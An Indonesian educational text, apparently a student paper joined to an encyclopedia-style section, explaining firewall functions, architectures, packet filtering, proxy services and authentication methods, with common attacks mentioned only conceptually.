Bahkan bisa jadi software pada server itu sendiri , seperti layanan untuk web ataupun untuk mail. � Direction Conrol (kendali terhadap arah) Berdasarkan arah dari berbagai permintaan (request) terhadap layanan yang akan dikenali dan diijinkan melewati firewall. � User control (kendali terhadap pengguna) Berdasarkan pengguna/user untuk dapat menjalankan suatu layanan, artinya ada user yang dapat dan ada yang tidak dapat menjalankan suatu servis,hal ini di karenakan user tersebut tidak di ijinkan untuk melewati firewall. Biasanya digunakan untuk membatasi user dari jaringan lokal untuk mengakses keluar, tetapi bisa juga diterapkan untuk membatasi terhadap pengguna dari luar. � Behavior Control (kendali terhadap perlakuan) Berdasarkan seberapa banyak layanan itu telah digunakan. Misalnya, firewall dapat memfilter email untuk menanggulangi/mencegah spam. Arsitektur Firewall Ada beberapa arsitektur atau konfigurasi dari firewall. Pada makalah ini hanya akan dijelaskan beberapa diantaranya, yaitu : dual-homed host architecture, screened host architecture, dan screened subnet architecture. Adapun penjelasannya dapat dijelaskan sebagai berikut. - Dual-homed host architecture Arsitektur dual-home host dibuat disekitar komputer dual-homed host, yaitu komputer yang memiliki paling sedikit dua interface jaringan.
Untuk mengimplementasikan tipe arsitektur dual-homed host, fungsi routing pada host ini di non-aktifkan. Sistem di dalam firewall dapat berkomunikasi dengan dual-homed host dan sistem di luar firewall dapat berkomunikasi dengan dual-homed host, tetapi kedua sistem ini tidak dapat berkomunikasi secara langsung. Gambaran arsitektur ini seperti gambar 4. Gambar 4 Dual-homed host architecture Halaman | 5 Dual-homed host dapat menyediakan service hanya dengan menyediakan proxy pada host tersebut, atau dengan membiarkan user melakukan logging secara langsung pada dual-homed host. - Screened host architecture Arsitektur screened host menyediakan service dari sebuah host pada jaringan internal dengan menggunakan router yang terpisah. Pada arsitektur ini, pengamanan utama dilakukan dengan packet filtering seperti gambar 5. Bastion host berada dalam jaringan internal. Packet filtering pada screening router dikonfigurasi sehingga hanya bastion host yang dapat melakukan koneksi ke Internet (misalnya mengantarkan mail yang datang) dan hanya tipe-tipe koneksi tertentu yang diperbolehkan. Tiap sistem eksternal yang mencoba untuk mengakses sistem internal harus berhubungan dengan host ini terlebih dulu. Bastion host diperlukan untuk tingkat keamanan yang tinggi. - Screened subnet architecture Arsitektur screened subnet menambahkan sebuah layer pengaman tambahan pada arsitekture screened host, yaitu dengan menambahkan sebuah jaringan perimeter yang lebih mengisolasi jaringan internal dari jaringan Internet. Jaringan perimeter mengisolasi bastion host sehingga tidak langsung terhubung ke jaringan internal. Arsitektur screened subnet yang paling sederhana memiliki dua buah screening router, yang masing-masing terhubung ke jaringan perimeter. Router pertama terletak di antara jaringan perimeter dan jaringan internal, dan router kedua terletak di antara jaringan perimeter dan jaringan eksternal (biasanya Internet). Gambar 5 Screened host architecture
Screened subnet architecture Untuk menembus jaringan internal dengan tipe arsitektur screened subnet, seorang intruder harus melewati dua buah router tersebut sehingga jaringan internal akan relatif lebih aman. Gambar 6 menunjukan gambar arsitektur screened subnet. Tipe-Tipe Firewall Ada beberapa tipe dari firewall yang ada. Selanjutnya akan dijelaskan secara lebih rinci seperti berikut. Ada empat jenis firewall, atau lebih tepatnya tiga jenis ditambah dengan satu tipe hybrid (campuran). Disini kita tidak akan membahas setiap jenis secara rinci karena itu membutuhkan pembahasan tersendiri yang lebih teknis dan umumnya sudah tersedia dalam dokumentasidokumentasi tentang firewall Arman (2007). Keempat jenis tersebut masing-masing adalah: 1. Packet Filtering Router Firewall jenis ini memfilter paket data berdasarkan alamat dan pilihan yang sudah ditentukan terhadap paket tersebut. Ia bekerja dalam level internet protokol (IP) paket data dan membuat keputusan mengenai tindakan selanjutnya (diteruskan atau tidak diteruskan) berdasarkan kondisi dari paket tersebut.
Firewall jenis ini terbagi lagi menjadi tiga subtipe: o Static Filtering: Jenis filter yang diiplementasikan pada kebanyakan router, dimana modifikasi terhadap aturan-aturan filter harus dilakukan secara manual. o Dynamic Filtering: Apabila proses-proses tertentu di sisi luar jaringan dapat merubah aturan filer secara dinamis berdasarkan even-even tertentu yang diobservasi oleh router (sebagai contoh, paket FTP dari sisi luar dapat diijinkan apabila seseorang dari sisi dalam me-request sesi FTP).
Stateful Inspection: Dikembangkan berdasarkan teknologi yang sama dengan dynamic filtering dengan tambahan fungsi eksaminasi secara bertingkat berdasarkan muatan data yang terkandung dalam paket IP. Baik dynamic maupun static filtering menggunakan tabel status (state table) dinamis yang akan membuat aturan-aturan filter sesuai dengan even yang tengah berlangsung. Muammar W. K (2004) menambahkan bahwa kelemahan tipe ini adalah cukup rumitnya untuk menyetting paket yang akan difilter secara tepat, serta lemah dalam hal authentikasi. Adapun serangan yang dapat terjadi pada firewall dengan tipe ini adalah: IP address spoofing : Intruder (penyusup) dari luar dapat melakukan ini dengan cara menyertakan/menggunakan ip address jaringan lokal yang telah diijinkan untuk melalui firewall. Source routing attacks : Tipe ini tidak menganalisa informasi routing sumber IP, sehingga memungkinkan untuk membypass firewall. � Tiny Fragment attacks : Intruder membagi IP kedalam bagian-bagian (fragment) yang lebih kecil dan memaksa terbaginya informasi mengenai TCP header. Serangan jenis ini di design untuk menipu aturan penyaringan yang bergantung kepada informasi dari TCP header. Penyerang berharap hanya bagian (fragment) pertama saja yang akan di periksa dan sisanya akan bisa lewat dengan bebas. Hal ini dapat di tanggulangi dengan cara menolak semua packet dengan protokol TCP dan memiliki Offset = 1 pada IP fragment (bagian IP) Halaman | 7 2. Circuit Gateways Firewall jenis ini beroperasi pada layer (lapisan) transpor pada network, dimana koneksi juga diautorisasi berdasarkan alamat. Sebagaimana halnya Packet Filtering, Circuit Gateway (biasanya) tidak dapat memonitor trafik data yang mengalir antara satu network dengan network lainnya, tetapi ia mencegah koneksi langsung antar network. Cara kerjanya adalah gateway akan mengatur kedua hubungan tcp tersebut, 1 antara dirinya (gw) dengan TCP pada pengguna lokal (inner host) serta 1 lagi antara dirinya (gw) dengan TCP pengguna luar (outside host). Saat dua buah hubungan terlaksana, gateway akan menyalurkan TCP segment dari satu hubungan ke lainnya tanpa memeriksa isinya. Fungsi pengamanannya terletak pada penentuan hubungan mana yang di ijinkan. Penggunaan tipe ini biasanya dikarenakan administrator percaya dengan pengguna internal (internal users). Dapat digambarkan seperti gambar 8. 3. Application Gateways Firewall tipe ini juga disebut sebagai firewall berbasis proxy. Ia beroperasi di level aplikasi dan dapat mempelajari informasi pada level data aplikasi (yang dimaksudkan disini adalah isi (content) dari paket data karena proxy pada dasarnya tidak beroperasi pada paket data).
Filterisasi dilakukan berdasarkan data aplikasi, seperti perintah-perintah FTP atau URL yang diakses lewat HTTP. Dapat Gambar 8 Circuit Gateways Gambar 7 Packet filtering Halaman | 8 dikatakan bahwa firewall jenis ini “memecah model client-server”. Cara kerjanya adalah apabila ada pengguna yang menggunakan salah satu aplikasi semisal FTP untuk mengakses secara remote, maka gateway akan meminta user memasukkan alamat remote host yang akan di akses. Saat pengguna mengirimkan user ID serta informasi lainnya yang sesuai maka gateway akan melakukan hubungan terhadap aplikasi tersebut yang terdapat pada remote host, dan menyalurkan data diantara kedua titik. apabila data tersebut tidak sesuai maka firewall tidak akan meneruskan data tersebut atau menolaknya. Lebih jauh lagi, pada tipe ini Firewall dapat di konfigurasikan untuk hanya mendukung beberapa aplikasi saja dan menolak aplikasi lainnya untuk melewati firewall. Kelebihannya adalah relatif lebih aman daripada tipe packet filtering router lebih mudah untuk memeriksa (audit) dan mendata (log) semua aliran data yang masuk pada level aplikasi.
Kekurangannya adalah pemrosesan tambahan yang berlebih pada setiap hubungan. yang akan mengakibatkan terdapat dua buah sambungan koneksi antara pemakai dan gateway, dimana gateway akan memeriksa dan meneruskan semua arus dari dua arah. Agar lebih jelas, dapat digambarkan seperti gambar 9. 4. Hybrid Firewalls Firewall jenis ini menggunakan elemen-elemen dari satu atau lebih tipe firewall. Hybrid firewall sebenarnya bukan sesuatu yang baru. Firewall komersial yang pertama, DEC SEAL, adalah firewall berjenis hybrid, dengan menggunakan proxy pada sebuah bastion hosts (mesin yang dilabeli sebagai “gatekeeper” ) dan packet filtering pada gateway (“gate”). Sistem hybrid seringkali digunakan untuk menambahkan layanan baru secara cepat pada sistem firewall yang sudah tersedia. Kita bisa saja menambahkan sebuah circuit gateway atau packet filtering pada firewall berjenis application gateway, karena untuk itu hanya diperlukan kode proxy yang baru yang ditulis untuk setiap service baru yang akan disediakan. Kita juga dapat memberikan autentifikasi pengguna yang lebih ketat pada Stateful Packet Filer dengan menambahkan proxy untuk tiap service. Sistem Pengamanan Menggunakan Firewall Pada dasarnya kita manusia memerlukan privasi dimana kita dapat menuangkan seluruh pemikiran dan ide-ide yang muncul dipikiran kita. Dilihat dari segi penyerangan banyak jaringan yang terserang karena kurangnya pengawasan. Berangkat dari Pengetahuan akan jaringan terdapat dua tipe sistem pengamanan yang dapat dibuat sebagai implementasi dari firewall. Rodiah (2004) mengatakan tipe sistem pengamanan tersebut antara lain : Gambar 9 Application Gateways Halaman | 9 1. Packet Filtering. 2. Proxy Services. Pada era abad ke-21 ini kita memerlukan suatu pengamanan yang terintegrasi.
Di subbab yang berikutnya akan dijelaskan secara detil tentang dua tipe sistem pengamanan yang telah disebutkan diatas. Packet Filtering Sistem pada paket filtering merupakan sistem yang digunakan untuk mengontrol keluar, masuknya paket dari antara host yang didalam dan host yang yang diluar tetapi sistem ini melakukannya secara selektif. Sistem ini dapat memberikan jalan atau menghalangi paket yang dikirimkan, sistem ini sangat mengkitalkan arsitektur yang disebut dengan ‘Screened Router’. Router ini menjadi filter dengan menganalisa bagian kepala dari setiap paket yang dikirimkan. Karena bagian kepala dari paket ini berisikan informasi penting yaitu : � IP source address. � IP destination address. � Protocol (dengan melihat apakah paket tersebut berbentuk TCP, UDP atau ICMP). � Port sumber dari TCP atau UDP. � Port tujuan dari TCP atau UDP. � Tipe pesan dari ICMP. � Ukuran dari paket. Cara Kerja Sistem Packet Filtering ini adalah mengawasi secara individual dengan melihat melalui router, sedangkan router yang telah dimaksud adalah sebuah perangkat keras yang dapat berfungsi sebagai sebuah server karena alat ini harus membuat keputusan untuk me-rout seluruh paket yang diterima. Alat ini juga harus menentukan seperti apakah pengiriman paket yang telah didapat itu kepada tujuan yang sebenarnya. Dalam hal ini router tersebut saling berkomunikasi dengan protokol-protokol untuk me-rout. Protokol yang dimaksudkan adalah Routing Information Protocol (RIP) atau Open Shortest Path First (OSPF) yang menghasilkan sebuah table routing. Tabel routing itu menunjukkan kemana tujuan dari paket yang diterima. Router yang menjadi filter pada packet filtering dapat menyediakan sebuah choke point (sebuah channel yang sempit yang sering digunakan untuk dipakai oleh penyerang sistem dan tentu saja dapat dipantau juga dikontrol oleh kita) untuk semua pengguna yang memasuki dan meninggalkan network. Karena sistem ini beroperasi ditingkat Network Layer dan Transport Layer dari tingkatan protokol pada tingkatan pada Transmission Control Protocol (TCP/IP). Bagian kepala dari network dan transport mengawasi informasi-informasi berikut: � Protokol (IP header, pada network layer); didalamnya byte 9 mengidentifikasikan protokol dari paket. � Source address (IP header, pada network layer); alamat sumber merupakan alamat IP 32 bit dari host yang menciptakan oleh paket. � Destination address (IP header, pada network layer); alamat tujuan yang berukuran 32 bit dari host yang menjadi tujuan dari paket. � Source port (TCP atau UDP header, pada transport layer); pada setiap akhir dari koneksi TCP atau UDP tersambung dengan sebuah port, Walaupun port-port TCP terpisah dan cukup jauh dari port-port user datagram protocol (UDP). Port-port yang mempunyai nomor dibawah 1024 diterbalikan karena nomor-nomor ini telah didefinisikan secar khusus, sedangkan untuk port-port yang bernomor diatas 1024 (inklusif) lebih dikenal dengan port Halaman | 10 ephermal. Konfigurasi dari nomor pengalamatan ini diberikan sesuai dengan pilihan dari vendor.
� Destination port (TCP atau UDP header, transport layer); nomor port dari tujuan mengindikasikan port yang dikirimi paket. Servis yang akan diberikan pada sebuah host dengan mendengarkan port. Adapun port yang difilter adalah 20/TCP dan 21/TCP untuk koneksi ftp atau data, 23/TCP untuk telnet, 80/TCP untuk http dan 53/TCP untuk zona transfer DNS. � Connection status (TCP atau UDP header, transport layer); status dari koneksi memberitahukan apakah paket yang dikirim merupakan paket pertama dari sesi di network. Jika paket merupakan paket pertama maka pada TCP header diberlakukan ‘false’ atau 0 dan untuk mencegah sebuah host untuk mengadakan koneksi dengan menolak atau membuang paket yang mempunyai bit set ‘false’ atau 0. TCP & UDP menggunakan port number ini untuk membedakan pengiriman paket data ke beberapa aplikasi berbeda yang terletak pada komputer yang sama (Stiawan, 2008). Pada saat paket data di alamatkan ke tujuan, komputer tujuan harus mengetahui yang harus dilakukan pada paket tersebut, protocol TCP/IP menggunakan salah satu dari 65,536 pengelamatan penomeran port. Port number inilah yang akan membedakan antara satu aplikasi dengan aplikasi lainnya atau satu protocol dengan protocol lainnya pada saat proses transmisi data antara sumber dan tujuan. Port number dapat digambarkan pada gambar 10. Untuk dapat melewatkan paket data dari sumber ke tujuan pada router terdapat protocol pengelamatan atau routing protocol yang saling mengupdate antara satu dengan yang lainya agar dapat melewatkan data sesuai dengan tujuannya. Di peralatan router layer 3 diperlukan konfigurasi khusus agar paket data yang masuk dan keluar dapat diatur, Access Control List (ACL) adalah pengelompokan paket berdasarkan kategori yang mengatur lalu lintas network. Dengan menggunakan ACL ini kita bisa melakukan filtering dan blocking paket data yang yang masuk dan keluar dari network atau mengatur akses ke sumber daya di network (Stiawan, 2008).
Contoh sebuah topologi jaringan dengan menggunakan router dapat ditunjukan oleh gambar 11. Gambar 10 Port number Sumber: (Stiawan, 2008) Halaman | 11 Proxy Services Proxy memberikan akses internet untuk satu buah host atau host yang dalam jumlah kecil dengan terlihat seperti menyediakan akses untuk seluruh host kita. Sebuah proxy server untuk protokol tertentu atau sebuah set dari protokol dapat dijalankan pada sebuah dual-homed host atau pada bastion host. Pada proxy ini sangat mendukung arsitektur dari client/server. Clinet/server ini membentuk sebuah sistem dimana komponen-komponen dari software saling berinteraksi. Dalam hal ini para klien dapat meminta seluruh kebutuhan dan pelayanan yang dinginkan dan server menyediakannya. Sistem proxy ini harus mendukung seluruh pelayanan yang diminta dan diperlukan oleh klien. Karena hal ini maka server harus mempunyai file server yang sangat besar dan selalu aktif dimana file-file yang terdapat pada server akan digunakan oleh setiap komputer yang terhubung baik dalam Lokal Area Network (LAN) ataupun Wide Area Network (WAN). Pada file server selain dari list yang cukup panjang sebagai database yang dapat digunakan oleh setiap klien yang akan menggunakan alamat IP yang legal, terdapat juga file-file untuk aplikasi yang bekerja pada server utama. Proxy merupakan sistem pengamanan yang memerlukan alamat IP yang jelas dan valid, karena server yang utama terdapat di internet. Pada proxy terdapat empat pendekatan yang akan dilakukan pada sisi klien yang sangat berperan penting.

Pendekatanpendekatan tersebut yaitu : � Proxy-aware application software. Dengan pendekatan ini software harus mengetahui bagaimana untuk membuat kontak dengan proxy server daripada dengan server yang sebenarnya ketika user membuat suatu permintaan; dan bagaimana memberitahukan proxy server, server asli yang mana yang harus dibuatkan koneksi. Ini terlihat pada gambar 12. Gambar 11 Topologi jaringan dengan menggunakan router Sumber: (Stiawan, 2008) Halaman | 12 � Proxy-aware operating system software. Dengan pendekatan ini, sistem operasi yang dijalankan oleh user sudah harus dimodifikasikan sehingga koneksi IP yang sudah diperiksa untuk apakah paket tersebut harus dikirimkan kepada proxy server. Mekanisasi dari ini sangat bergantung sekali pada runtime linking yang dinamis (kemampuannya untuk memberikan library ketika program dijalankan).mekanisme ini tidak selalu berjalan dengan mulus dan dapat gagal yang tidak wajar untuk user. � Proxy-aware user procedures. Pendekatan ini pengguna menggunakan software client yang tidak mengerti bagaimana me-proxy, dimana untuk berbicara (berkomunikasi) ke server proxy dan memberitahukan proxy server untuk melakukan hubungan kepada server yang sebenarnya daripada memberitahukan software klien untuk berkomunikasi secara langsung ke server yang sebenarnya. � Proxy-aware router. Pendekatan yang terakhir ini software yang klien gunakan tidak dimodifikasikan tetapi sebuah router akan mengantisipasi koneksi dan melangsungkan ke proxy server atau proxy yang diminta. Mekanisme ini membutuhkan sebuah router yang pintar disamping software proxy (meskipun me-proxy dan me-rout tidak bisa tampil pada mesin yang sama). Mekanisme pada proxy ini diperlihatkan pada gambar 13. Gambar 12 Software untuk proxy-aware pada sistem proxy Halaman | 13 Penggunaan Proxy Server dapat dijadikan solusi untuk melakukan screening dan blocking di layer 7, dengan menggunakan proxy dapat menyaring paket-paket berdasarkan policy yang dibuat, misalnya berdasarkan alamat web tertentu.
Gambar 13 Proxy-aware router pada sistem proxy Gambar Blocking dengan proxy dapat dioptimalkan dengan menyaring alamat-alamat web yang mengandung content pornography, kekerasan, virus atau trojan, ilegal software dan sebagainya. Pada gambar 14 terlihat metode filtering di layer 7 bisa menyaring content website berdasarkan URL yang tidak diperbolehkan mengakses ke jaringan kita, baik paket data yang keluar atau paket data yang masuk. Kesimpulan Berdasarkan penjelasan yang sudah disampaikan, dapat diambil beberapa kesimpula yaitu keberadaan suatu firewall sangat penting digunakan dalam suatu jaringan yang terkoneksi langsung ke internet atau yang lebih dikenal dengan jaringan publik yang dapat diakses oleh siapapun dan dimanapun. Sehingga peran firewall disana sangat berguna karena sebagai pembatas yang mengatur dan mengendalikan akses yang dilakukan untuk mengurangi dan mencegah ancaman-ancaman dari internet yang masuk ke jaringan lokal.
Adapun riwayat pendidikan adalah sebagai berikut : Menamatkan pendidikan sekolah dasar di SDN 4 Perean, melanjutkan ke SLTP N 2 Baturiti, kemudian masuk di SMU N 1 Tabanan, dan setelah tamat SMU tertarik terhadap IT sehingga melanjutkan kuliah di Universitas Pendidikan Ganesha (Undiksha) Singaraja-Bali, mengambil jurusan D-3 Manajemen Informatika. Saat kuliah aktif di dalam organisasi kemahasiswaan seperti himpunan mahasiswa jurusan (HMJ), SENAT, dan UKM. Pada tahun 2007 lulus dari Undiksha dan kemudian melanjutkan S1 ke Yogyakarta di Universitas Gadjah Mada (UGM), mengambil program studi Ilmu Komputer di bawah jurusan Matematika. Saat ini masih berstatus sebagai mahasiswa aktif di UGM. Berkeinginan menjadi seorang pengembang IT. Tertarik terhadap jaringan komputer( Network ), sistem pendukung keputusan (SPK), dan sistem informasi. Saat ini sedang mengambil skripsi dengan minat sistem cerdas. Informasi lebih lanjut tentang penulis ini bisa didapat melalui: URL : http://agus-aan.web.ugm.ac.id Email : studywithaan@gmail.com agus-aan@mail.ugm.ac.id
Fungsi Firewall
Secara fundamental, firewall dapat melakukan hal-hal berikut:
• Mengatur dan mengontrol lalu lintas jaringan
• Melakukan autentikasi terhadap akses
• Melindungi sumber daya dalam jaringan privat
• Mencatat semua kejadian, dan melaporkan kepada administrator
Mengatur dan Mengontrol Lalu lintas jaringan
Fungsi pertama yang dapat dilakukan oleh firewall adalah firewall harus dapat mengatur dan mengontrol lalu lintas jaringan yang diizinkan untuk mengakses jaringan privat atau komputer yang dilindungi oleh firewall. Firewall melakukan hal yang demikian, dengan melakukan inspeksi terhadap paket-paket dan memantau koneksi yang sedang dibuat, lalu melakukan penapisan (filtering) terhadap koneksi berdasarkan hasil inspeksi paket dan koneksi tersebut.

Proses inspeksi Paket
Inspeksi paket ('packet inspection) merupakan proses yang dilakukan oleh firewall untuk 'menghadang' dan memproses data dalam sebuah paket untuk menentukan bahwa paket tersebut diizinkan atau ditolak, berdasarkan kebijakan akses (access policy) yang diterapkan oleh seorang administrator. Firewall, sebelum menentukan keputusan apakah hendak menolak atau menerima komunikasi dari luar, ia harus melakukan inspeksi terhadap setiap paket (baik yang masuk ataupun yang keluar) di setiap antarmuka dan membandingkannya dengan daftar kebijakan akses. Inspeksi paket dapat dilakukan dengan melihat elemen-elemen berikut, ketika menentukan apakah hendak menolak atau menerima komunikasi:
• Alamat IP dari komputer sumber
• Port sumber pada komputer sumber
• Alamat IP dari komputer tujuan
• Port tujuan data pada komputer tujuan
• Protokol IP
• Informasi header-header yang disimpan dalam paket
Koneksi dan Keadaan Koneksi
Agar dua host TCP/IP dapat saling berkomunikasi, mereka harus saling membuat koneksi antara satu dengan lainnya. Koneksi ini memiliki dua tujuan:
1. Komputer dapat menggunakan koneksi tersebut untuk mengidentifikasikan dirinya kepada komputer lain, yang meyakinkan bahwa sistem lain yang tidak membuat koneksi tidak dapat mengirimkan data ke komputer tersebut. Firewall juga dapat menggunakan informasi koneksi untuk menentukan koneksi apa yang diizinkan oleh kebijakan akses dan menggunakannya untuk menentukan apakah paket data tersebut akan diterima atau ditolak.
2. Koneksi digunakan untuk menentukan bagaimana cara dua host tersebut akan berkomunikasi antara satu dengan yang lainnya (apakah dengan menggunakan koneksi connection-oriented, atau connectionless).


Ilustrasi mengenai percakapan antara dua buah host
Kedua tujuan tersebut dapat digunakan untuk menentukan keadaan koneksi antara dua host tersebut, seperti halnya cara manusia bercakap-cakap. Jika Amir bertanya kepada Aminah mengenai sesuatu, maka Aminah akan meresponsnya dengan jawaban yang sesuai dengan pertanyaan yang diajukan oleh Amir; Pada saat Amir melontarkan pertanyaannya kepada Aminah, keadaan percakapan tersebut adalah Amir menunggu respons dari Aminah. Komunikasi di jaringan juga mengikuti cara yang sama untuk memantau keadaan percakapan komunikasi yang terjadi.
Firewall dapat memantau informasi keadaan koneksi untuk menentukan apakah ia hendak mengizinkan lalu lintas jaringan. Umumnya hal ini dilakukan dengan memelihara sebuah tabel keadaan koneksi (dalam istilah firewall: state table) yang memantau keadaan semua komunikasi yang melewati firewall. Dengan memantau keadaan koneksi ini, firewall dapat menentukan apakah data yang melewati firewall sedang "ditunggu" oleh host yang dituju, dan jika ya, aka mengizinkannya. Jika data yang melewati firewall tidak cocok dengan keadaan koneksi yang didefinisikan oleh tabel keadaan koneksi, maka data tersebut akan ditolak. Hal ini umumnya disebut sebagai Stateful Inspection.
Stateful Packet Inspection
Ketika sebuah firewall menggabungkan stateful inspection dengan packet inspection, maka firewall tersebut dinamakan dengan Stateful Packet Inspection (SPI). SPI merupakan proses inspeksi paket yang tidak dilakukan dengan menggunakan struktur paket dan data yang terkandung dalam paket, tapi juga pada keadaan apa host-host yang saling berkomunikasi tersebut berada. SPI mengizinkan firewall untuk melakukan penapisan tidak hanya berdasarkan isi paket tersebut, tapi juga berdasarkan koneksi atau keadaan koneksi, sehingga dapat mengakibatkan firewall memiliki kemampuan yang lebih fleksibel, mudah diatur, dan memiliki skalabilitas dalam hal penapisan yang tinggi.
Salah satu keunggulan dari SPI dibandingkan dengan inspeksi paket biasa adalah bahwa ketika sebuah koneksi telah dikenali dan diizinkan (tentu saja setelah dilakukan inspeksi), umumnya sebuah kebijakan (policy) tidak dibutuhkan untuk mengizinkan komunikasi balasan karena firewall tahu respons apa yang diharapkan akan diterima. Hal ini memungkinkan inspeksi terhadap data dan perintah yang terkandung dalam sebuah paket data untuk menentukan apakah sebuah koneksi diizinkan atau tidak, lalu firewall akan secara otomatis memantau keadaan percakapan dan secara dinamis mengizinkan lalu lintas yang sesuai dengan keadaan. Ini merupakan peningkatan yang cukup signifikan jika dibandingkan dengan firewall dengan inspeksi paket biasa. Apalagi, proses ini diselesaikan tanpa adanya kebutuhan untuk mendefinisikan sebuah kebijakan untuk mengizinkan respons dan komunikasi selanjutnya. Kebanyakan firewall modern telah mendukung fungsi ini.
Melakukan autentikasi terhadap akses
Fungsi fundamental firewall yang kedua adalah firewall dapat melakukan autentikasi terhadap akses.
Protokol TCP/IP dibangun dengan premis bahwa protokol tersebut mendukung komunikasi yang terbuka. Jika dua host saling mengetahui alamat IP satu sama lainnya, maka mereka diizinkan untuk saling berkomunikasi. Pada awal-awal perkembangan Internet, hal ini boleh dianggap sebagai suatu berkah. Tapi saat ini, di saat semakin banyak yang terhubung ke Internet, mungkin kita tidak mau siapa saja yang dapat berkomunikasi dengan sistem yang kita miliki. Karenanya, firewall dilengkapi dengan fungsi autentikasi dengan menggunakan beberapa mekanisme autentikasi, sebagai berikut:
• Firewall dapat meminta input dari pengguna mengenai nama pengguna (user name) serta kata kunci (password). Metode ini sering disebut sebagai extended authentication atau xauth. Menggunakan xauth pengguna yang mencoba untuk membuat sebuah koneksi akan diminta input mengenai nama dan kata kuncinya sebelum akhirnya diizinkan oleh firewall. Umumnya, setelah koneksi diizinkan oleh kebijakan keamanan dalam firewall, firewall pun tidak perlu lagi mengisikan input password dan namanya, kecuali jika koneksi terputus dan pengguna mencoba menghubungkan dirinya kembali.
• Metode kedua adalah dengan menggunakan sertifikat digital dan kunci publik. Keunggulan metode ini dibandingkan dengan metode pertama adalah proses autentikasi dapat terjadi tanpa intervensi pengguna. Selain itu, metode ini lebih cepat dalam rangka melakukan proses autentikasi. Meskipun demikian, metode ini lebih rumit implementasinya karena membutuhkan banyak komponen seperti halnya implementasi infrastruktur kunci publik.
• Metode selanjutnya adalah dengan menggunakan Pre-Shared Key (PSK) atau kunci yang telah diberitahu kepada pengguna. Jika dibandingkan dengan sertifikat digital, PSK lebih mudah diimplenentasikan karena lebih sederhana, tetapi PSK juga mengizinkan proses autentikasi terjadi tanpa intervensi pengguna. Dengan menggunakan PSK, setiap host akan diberikan sebuah kunci yang telah ditentukan sebelumnya yang kemudian digunakan untuk proses autentikasi. Kelemahan metode ini adalah kunci PSK jarang sekali diperbarui dan banyak organisasi sering sekali menggunakan kunci yang sama untuk melakukan koneksi terhadap host-host yang berada pada jarak jauh, sehingga hal ini sama saja meruntuhkan proses autentikasi. Agar tercapai sebuah derajat keamanan yang tinggi, umumnya beberapa organisasi juga menggunakan gabungan antara metode PSK dengan xauth atau PSK dengan sertifikat digital.
Dengan mengimplementasikan proses autentikasi, firewall dapat menjamin bahwa koneksi dapat diizinkan atau tidak. Meskipun jika paket telah diizinkan dengan menggunakan inspeksi paket (PI) atau berdasarkan keadaan koneksi (SPI), jika host tersebut tidak lolos proses autentikasi, paket tersebut akan dibuang.
Melindungi sumber daya dalam jaringan privat
Salah satu tugas firewall adalah melindungi sumber daya dari ancaman yang mungkin datang. Proteksi ini dapat diperoleh dengan menggunakan beberapa peraturan pengaturan akses (access control), penggunaan SPI, application proxy, atau kombinasi dari semuanya untuk mencegah host yang dilindungi dapat diakses oleh host-host yang mencurigakan atau dari lalu lintas jaringan yang mencurigakan. Meskipun demikian, firewall bukanlah satu-satunya metode proteksi terhadap sumber daya, dan mempercayakan proteksi terhadap sumber daya dari ancaman terhadap firewall secara eksklusif adalah salah satu kesalahan fatal. Jika sebuah host yang menjalankan sistem operasi tertentu yang memiliki lubang keamanan yang belum ditambal dikoneksikan ke Internet, firewall mungkin tidak dapat mencegah dieksploitasinya host tersebut oleh host-host lainnya, khususnya jika exploit tersebut menggunakan lalu lintas yang oleh firewall telah diizinkan (dalam konfigurasinya). Sebagai contoh, jika sebuah packet-inspection firewall mengizinkan lalu lintas HTTP ke sebuah web server yang menjalankan sebuah layanan web yang memiliki lubang keamanan yang belum ditambal, maka seorang pengguna yang "iseng" dapat saja membuat exploit untuk meruntuhkan web server tersebut karena memang web server yang bersangkutan memiliki lubang keamanan yang belum ditambal. Dalam contoh ini, web server tersebut akhirnya mengakibatkan proteksi yang ditawarkan oleh firewall menjadi tidak berguna. Hal ini disebabkan oleh firewall yang tidak dapat membedakan antara request HTTP yang mencurigakan atau tidak. Apalagi, jika firewall yang digunakan bukan application proxy. Oleh karena itulah, sumber daya yang dilindungi haruslah dipelihara dengan melakukan penambalan terhadap lubang-lubang keamanan, selain tentunya dilindungi oleh firewall.
Mencatat semua kejadian, dan melaporkan kepada administrator
[Placeholder]
Cara Kerja Firewall
Packet-Filter Firewall


Contoh pengaturan akses (access control) yang diterapkan dalam firewall
Pada bentuknya yang paling sederhana, sebuah firewall adalah sebuah router atau komputer yang dilengkapi dengan dua buah NIC (Network Interface Card, kartu antarmuka jaringan) yang mampu melakukan penapisan atau penyaringan terhadap paket-paket yang masuk. Perangkat jenis ini umumnya disebut dengan packet-filtering router.
Firewall jenis ini bekerja dengan cara membandingkan alamat sumber dari paket-paket tersebut dengan kebijakan pengontrolan akses yang terdaftar dalam Access Control List firewall, router tersebut akan mencoba memutuskan apakah hendak meneruskan paket yang masuk tersebut ke tujuannya atau menghentikannya. Pada bentuk yang lebih sederhana lagi, firewall hanya melakukan pengujian terhadap alamat IP atau nama domain yang menjadi sumber paket dan akan menentukan apakah hendak meneruskan atau menolak paket tersebut. Meskipun demikian, packet-filtering router tidak dapat digunakan untuk memberikan akses (atau menolaknya) dengan menggunakan basis hak-hak yang dimiliki oleh pengguna.


Cara kerja packet filter firewall
Packet-filtering router juga dapat dikonfigurasikan agar menghentikan beberapa jenis lalu lintas jaringan dan tentu saja mengizinkannya. Umumnya, hal ini dilakukan dengan mengaktifkan/menonaktifkan port TCP/IP dalam sistem firewall tersebut. Sebagai contoh, port 25 yang digunakan oleh Protokol SMTP (Simple Mail Transfer Protocol) umumnya dibiarkan terbuka oleh beberapa firewall untuk mengizinkan surat elektronik dari Internet masuk ke dalam jaringan privat, sementara port lainnya seperti port 23 yang digunakan oleh Protokol Telnet dapat dinonaktifkan untuk mencegah pengguna Internet untuk mengakses layanan yang terdapat dalam jaringan privat tersebut. Firewall juga dapat memberikan semacam pengecualian (exception) agar beberapa aplikasi dapat melewati firewall tersebut. Dengan menggunakan pendekatan ini, keamanan akan lebih kuat tapi memiliki kelemahan yang signifikan yakni kerumitan konfigurasi terhadap firewall: daftar Access Control List firewall akan membesar seiring dengan banyaknya alamat IP, nama domain, atau port yang dimasukkan ke dalamnya, selain tentunya juga exception yang diberlakukan.
Circuit Level Gateway


Cara kerja circuit level firewall
